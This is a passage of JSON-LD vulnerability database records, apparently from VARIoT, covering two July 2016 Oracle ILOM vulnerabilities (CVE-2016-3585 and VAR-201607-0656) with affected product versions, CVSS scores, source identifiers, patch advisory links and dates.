scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003872", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, cve: "CVE-2016-3585", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", exploitabilityScore: 8.6, id: "CVE-2016-3585", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", exploitabilityScore: 8.6, id: "VHN-92404", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:P/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.2, id: "CVE-2016-3585", impactScore: 5.2, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3585", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3585", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-777", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92404", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3585", trust: 0.1, value: "MEDIUM", }, ], }, ], 
sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality and integrity via vectors related to Emulex. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session 
Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in Integrated Lights Out Manager. 
\nThe vulnerability can be exploited over the 'HTTPS' protocol. The 'Emulex' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2", sources: [ { db: "NVD", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3585", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91952", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003872", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-777", trust: 0.7, }, { db: "VULHUB", id: "VHN-92404", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3585", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, id: "VAR-201607-0174", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92404", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:16:55.844000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: 
"http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63137", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3585", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91952", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3585", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3585", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: 
"http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92404", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3585", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91952", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003872", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-777", }, { date: "2016-07-21T10:14:24.237000", db: "NVD", id: "CVE-2016-3585", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92404", }, { date: "2017-09-01T00:00:00", 
db: "VULMON", id: "CVE-2016-3585", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91952", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003872", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-777", }, { date: "2024-11-21T02:50:19.770000", db: "NVD", id: "CVE-2016-3585", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Emulex Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003872", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, }
var-201607-0656
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect availability via vectors related to Console Redirection. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express; Oracle Database Server; Oracle Access Manager; Oracle BI Publisher; Oracle Business Intelligence Enterprise Edition; Oracle Directory Server Enterprise Edition; Oracle Exalogic Infrastructure; Oracle Fusion Middleware; Oracle GlassFish Server; Oracle HTTP Server; Oracle JDeveloper; Oracle Portal; Oracle WebCenter Sites; Oracle WebLogic Server; Outside In Technology; Hyperion Financial Reporting; Enterprise Manager Base Platform; Enterprise Manager for Fusion Middleware; Enterprise Manager Ops Center; Oracle E-Business Suite; Oracle Agile Engineering Data Management; Oracle Agile PLM; Oracle Demand Planning; Oracle Engineering Data Management; Oracle Transportation Management; PeopleSoft Enterprise FSCM; PeopleSoft Enterprise PeopleTools; JD Edwards EnterpriseOne Tools; Siebel Applications; Oracle Fusion Applications; Oracle Communications ASAP; Oracle Communications Core Session Manager; Oracle Communications EAGLE Application Processor; Oracle Communications Messaging Server; Oracle Communications Network Charging and Control; Oracle Communications Operations Monitor; Oracle Communications Policy Management; Oracle Communications Session Border Controller; Oracle Communications Unified Session Manager; Oracle Enterprise Communications Broker; Oracle Banking Platform; Oracle Financial Services Lending and Leasing; Oracle FLEXCUBE Direct Banking; Oracle Health Sciences Clinical Development Center; Oracle Health Sciences Information Manager; Oracle Healthcare Analytics Data Integration; Oracle Healthcare Master Person Index; Oracle Documaker; Oracle Insurance Calculation Engine; Oracle Insurance Policy Administration J2EE; Oracle Insurance Rules Palette; MICROS Retail XBRi Loss Prevention; Oracle Retail Central; Oracle Back Office; Oracle Returns Management; Oracle Retail Integration Bus; Oracle Retail Order Broker; Oracle Retail Service Backbone; Oracle Retail Store Inventory Management; Oracle Utilities Framework; Oracle Utilities Network Management System; Oracle Utilities Work and Asset Management; Oracle In-Memory Policy Analytics; Oracle Policy Automation; Oracle Policy Automation Connector for Siebel; Oracle Policy Automation for Mobile Devices; Primavera Contract Management; Primavera P6 Enterprise Project Portfolio Management; Oracle Java SE; Oracle Java SE Embedded; Oracle JRockit; 40G 10G 72/64 Ethernet Switch; Fujitsu M10-1 Servers; Fujitsu M10-4 Servers; Fujitsu M10-4S Servers; ILOM; Oracle Switch ES1-24; Solaris; Solaris Cluster; SPARC Enterprise M3000 Servers; SPARC Enterprise M4000 Servers; SPARC Enterprise M5000 Servers; SPARC Enterprise M8000 Servers; SPARC Enterprise M9000 Servers; Sun Blade 6000 Ethernet Switched NEM 24P 10GE; Sun Data Center InfiniBand Switch 36; Sun Network 10GE Switch 72p; Sun Network QDR InfiniBand Gateway Switch; Oracle Secure Global Desktop; Oracle VM VirtualBox; MySQL Server. Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. The product list above is the scope of the whole Critical Patch Update; this entry concerns only the ILOM issue described next. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Console Redirection' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0656", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
